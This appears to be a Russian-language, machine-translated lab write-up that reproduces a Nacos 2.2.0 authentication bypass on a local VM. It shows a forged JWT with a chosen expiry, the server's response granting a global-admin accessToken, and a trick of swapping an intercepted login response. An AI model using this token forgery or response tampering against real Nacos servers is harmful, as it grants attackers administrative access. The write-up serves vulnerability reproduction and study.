Эта уязвимость в основном использует среду win10_JAVA. Обратитесь к существующим статьям о повторениях в Интернете и используйте jdk-11.0.2_windows-x64_bin.exe.
Поскольку nacos после версии 2.2.0 устранил эту уязвимость, в этом повторении используется пакет 2.2.0.
После загрузки и распаковки его на виртуальную машину выполните
startup.cmd -m standalone
Начать местные НАКО
У меня нет членства в DiPad, и я не могу разобраться с eDonkey, поэтому попытался найти несколько мастеров по загрузке ISO-образа Win10, но безуспешно нашел решение на официальном сайте Windows, F12+ctrl. сдвиг M, установите UA в качестве устройства iPhone, а затем обновите, можно загрузить напрямую.
Для этой уязвимости необходимо сначала подготовить временную метку, превышающую текущее системное время. Текущее время этой машины — 2023/11/25, поэтому вы можете напрямую создать 2023/11/26 (1700982711).
Конкретное местоположение показано ниже:
Просто напишите временную метку напрямую:
Получить значение: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0
Я сообщил об ошибке 500 здесь. Я искал некоторую информацию и просил нескольких мастеров прислать ее.
Позже я спросил руководителя проектной группы, и он сказал, что это вопрос типа, который я добавил.
Content-Type: application/x-www-form-urlencoded
Вот и все
Получить сообщение токена:
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=96ABFAC9B2CE500678E99664225AE34F; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0
Content-Type: application/json
Date: Sat, 25 Nov 2023 07:35:21 GMT
Content-Length: 197
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMDk4MjcxMX0.zcBeSKVO7InaQlAgnpJkENEzL_1xFSauSdP-_8HihR0","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}
Использование hongzh0/hongzh0 «Авторизоваться» обязательно приведет к авторизации.
ответ на перехват,После замены обратного пакета авторизация прошла успешно.